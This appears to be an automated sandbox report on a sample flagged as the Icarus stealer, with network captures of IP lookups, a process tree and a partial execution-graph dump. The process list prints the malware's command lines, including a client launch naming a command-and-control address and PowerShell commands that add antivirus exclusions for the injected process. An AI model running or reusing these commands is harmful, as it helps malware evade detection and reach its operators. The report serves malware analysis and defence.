                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  18         | 192.168.2.7 | 50460       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:29.884742975 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:30.381728888 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:29 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  19         | 192.168.2.7 | 50462       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:32.517427921 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:33.169759035 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:32 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33
                                  Oct 5, 2024 16:47:33.203136921 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:32 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  20         | 192.168.2.7 | 50464       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:35.160059929 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:35.640785933 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:35 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  21         | 192.168.2.7 | 50466       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:37.806063890 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:38.294878960 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:37 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  22         | 192.168.2.7 | 50468       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:40.452059031 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:40.928097010 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:40 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  23         | 192.168.2.7 | 50470       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:43.088505030 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:43.570760965 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:43 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  24         | 192.168.2.7 | 50472       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:45.728125095 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:46.202620983 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:45 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  25         | 192.168.2.7 | 50474       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:48.449616909 CEST | 37                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:47:48.926489115 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:48 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  26         | 192.168.2.7 | 50476       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:51.091321945 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:51.576253891 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:50 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  27         | 192.168.2.7 | 50478       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:53.745146036 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:54.219775915 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:53 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  28         | 192.168.2.7 | 50480       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:56.388875961 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:57.013525009 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:56 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  29         | 192.168.2.7 | 50482       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:59.062292099 CEST | 37                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:48:00.299155951 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:59 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33
                                  Oct 5, 2024 16:48:00.299578905 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:59 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33
                                  Oct 5, 2024 16:48:00.299741983 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:59 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  30         | 192.168.2.7 | 50484       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:48:01.714131117 CEST | 37                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:48:02.192806005 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:02 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  31         | 192.168.2.7 | 50486       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:48:04.337232113 CEST | 37                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:48:04.810293913 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:04 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID:32
                                  Source IP:192.168.2.7
                                  Source Port:50488
                                  Destination IP:34.117.59.81
                                  Destination Port:80
                                  PID:7640
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp:Oct 5, 2024 16:48:06.978383064 CEST
                                  Bytes transferred:61
                                  Direction:OUT
                                  Data:GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Timestamp:Oct 5, 2024 16:48:07.471251011 CEST
                                  Bytes transferred:240
                                  Direction:IN
                                  Data:HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:07 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID:33
                                  Source IP:192.168.2.7
                                  Source Port:50490
                                  Destination IP:34.117.59.81
                                  Destination Port:80
                                  PID:7640
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp:Oct 5, 2024 16:48:09.596534014 CEST
                                  Bytes transferred:61
                                  Direction:OUT
                                  Data:GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Timestamp:Oct 5, 2024 16:48:10.092355967 CEST
                                  Bytes transferred:240
                                  Direction:IN
                                  Data:HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:09 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID:34
                                  Source IP:192.168.2.7
                                  Source Port:50492
                                  Destination IP:34.117.59.81
                                  Destination Port:80
                                  PID:7640
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp:Oct 5, 2024 16:48:12.167608976 CEST
                                  Bytes transferred:61
                                  Direction:OUT
                                  Data:GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Timestamp:Oct 5, 2024 16:48:12.669271946 CEST
                                  Bytes transferred:240
                                  Direction:IN
                                  Data:HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:12 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID:35
                                  Source IP:192.168.2.7
                                  Source Port:50494
                                  Destination IP:34.117.59.81
                                  Destination Port:80
                                  PID:7640
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp:Oct 5, 2024 16:48:14.744007111 CEST
                                  Bytes transferred:37
                                  Direction:OUT
                                  Data:GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Timestamp:Oct 5, 2024 16:48:15.223841906 CEST
                                  Bytes transferred:240
                                  Direction:IN
                                  Data:HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:14 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID:36
                                  Source IP:192.168.2.7
                                  Source Port:50496
                                  Destination IP:34.117.59.81
                                  Destination Port:80
                                  PID:7640
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp:Oct 5, 2024 16:48:17.259351015 CEST
                                  Bytes transferred:61
                                  Direction:OUT
                                  Data:GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Timestamp:Oct 5, 2024 16:48:17.731580973 CEST
                                  Bytes transferred:240
                                  Direction:IN
                                  Data:HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:16 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID:37
                                  Source IP:192.168.2.7
                                  Source Port:50498
                                  Destination IP:34.117.59.81
                                  Destination Port:80
                                  PID:7640
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp:Oct 5, 2024 16:48:19.748536110 CEST
                                  Bytes transferred:37
                                  Direction:OUT
                                  Data:GET /ip HTTP/1.1
                                  Host: ipinfo.io


                                  Session ID:38
                                  Source IP:192.168.2.7
                                  Source Port:50500
                                  Destination IP:34.117.59.81
                                  Destination Port:80
                                  Timestamp:Oct 5, 2024 16:48:22.398751974 CEST
                                  Bytes transferred:37
                                  Direction:OUT
                                  Data:GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Timestamp:Oct 5, 2024 16:48:22.872123003 CEST
                                  Bytes transferred:240
                                  Direction:IN
                                  Data:HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:22 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Target ID:0
                                  Start time:10:46:14
                                  Start date:05/10/2024
                                  Path:C:\Users\user\Desktop\licarisan_api.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\licarisan_api.exe"
                                  Imagebase:0x400000
                                  File size:4'038'008 bytes
                                  MD5 hash:65A683124FC4CA1839E95322370E2B0D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:10
                                  Start time:10:46:33
                                  Start date:05/10/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                  Imagebase:0xb50000
                                  File size:2'141'552 bytes
                                  MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Icarus, Description: Yara detected Icarus stealer, Source: 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:11
                                  Start time:10:46:33
                                  Start date:05/10/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\explorer.exe"
                                  Imagebase:0x7ff70ffd0000
                                  File size:5'141'208 bytes
                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:12
                                  Start time:10:46:33
                                  Start date:05/10/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM
                                  Imagebase:0x760000
                                  File size:46'832 bytes
                                  MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Icarus, Description: Yara detected Icarus stealer, Source: 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:13
                                  Start time:10:46:33
                                  Start date:05/10/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\explorer.exe /NoUACCheck
                                  Imagebase:0x7ff70ffd0000
                                  File size:5'141'208 bytes
                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:14
                                  Start time:10:46:33
                                  Start date:05/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:15
                                  Start time:10:46:34
                                  Start date:05/10/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\explorer.exe /NoUACCheck
                                  Imagebase:0x7ff70ffd0000
                                  File size:5'141'208 bytes
                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:17
                                  Start time:10:46:34
                                  Start date:05/10/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                                  Imagebase:0x410000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:18
                                  Start time:10:46:34
                                  Start date:05/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:19
                                  Start time:10:46:34
                                  Start date:05/10/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                                  Imagebase:0x410000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:20
                                  Start time:10:46:34
                                  Start date:05/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:21
                                  Start time:10:46:35
                                  Start date:05/10/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Imagebase:0xf30000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:22
                                  Start time:10:46:35
                                  Start date:05/10/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                                  Imagebase:0xf30000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:23
                                  Start time:11:47:32
                                  Start date:05/10/2024
                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                  Imagebase:0x7ff7fb730000
                                  File size:496'640 bytes
                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                    Execution Graph

                                    Execution Coverage:13.2%
                                    Dynamic/Decrypted Code Coverage:96.6%
                                    Signature Coverage:16.4%
                                    Total number of Nodes:1423
                                    Total number of Limit Nodes:179
28427->28438 29741 7a8055 22 API calls 28429->29741 28434 7a804b 28439 7aadd5 28438->28439 28440 7aa5c7 22 API calls 28438->28440 28439->27783 28441 7aa5bd 28440->28441 28443 7a5603 28442->28443 28444 7a5610 28443->28444 28449 7a56de 28443->28449 29743 7a5625 VirtualProtect 28444->29743 28450 7a5d9d VirtualProtect 28449->28450 28451 7a5dfc 28450->28451 28453 7ab834 28452->28453 28454 7ab909 28453->28454 28459 7ac1d6 28453->28459 29744 7ab9b3 6 API calls 28454->29744 28460 7ac896 VirtualFree 28459->28460 28461 7ac8ba 28460->28461 28461->27783 28463 7c803f 28462->28463 28464 7c8094 28463->28464 28465 7c8cbd VirtualProtect 28463->28465 28466 7c8cff 28465->28466 28468 7ac33e 28467->28468 28469 7ac896 VirtualFree 28468->28469 28470 7ac8ba 28469->28470 28470->27783 28472 7ac54a VirtualFree 28471->28472 28474 7ac8ba 28472->28474 28474->27783 28478 7ac14d 28475->28478 28476 7ac896 VirtualFree 28477 7ac8ba 28476->28477 28477->27783 28478->28476 28480 7ac038 28479->28480 28481 7ac08c 3 API calls 28480->28481 28482 7ac05e 28480->28482 28481->28480 28483 7ac108 28482->28483 28486 7ac1d6 28482->28486 28484 7ac117 2 API calls 28483->28484 28485 7ac10e 28484->28485 28487 7ac896 VirtualFree 28486->28487 28488 7ac8ba 28487->28488 28488->27783 28492 7b294d VirtualProtect 28489->28492 28491 7b29f8 28492->28491 28494 7c84da 28493->28494 28495 7c84e7 28494->28495 28498 7c85b5 28494->28498 28496 7c8553 2 API calls 28495->28496 28497 7c854b 28496->28497 28499 7c8cbd VirtualProtect 28498->28499 28500 7c8cff 28499->28500 28502 7b28a8 VirtualProtect 28501->28502 28504 7b2907 28502->28504 28506 7b294d VirtualProtect 28502->28506 29745 7b2923 VirtualProtect 28504->29745 28509 7b29f8 28506->28509 28511 7ab495 VirtualAlloc 28510->28511 28513 7ab53a 28511->28513 28516 7ab55f 28511->28516 28514 7ab54b 8 API calls 28513->28514 28515 7ab540 28514->28515 28517 7ab568 7 API calls 28515->28517 28518 7ab909 28516->28518 28523 7ac1d6 28516->28523 28517->28516 29746 7ab9b3 6 API calls 28518->29746 28524 
